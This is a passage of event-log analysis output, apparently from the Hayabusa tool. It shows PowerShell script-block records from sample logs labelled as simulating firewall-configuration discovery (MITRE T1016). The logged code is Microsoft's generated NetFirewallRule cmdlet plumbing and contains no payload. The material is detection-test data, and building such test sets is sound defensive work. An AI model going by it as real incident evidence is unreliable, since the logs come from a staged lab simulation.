Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"mdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] 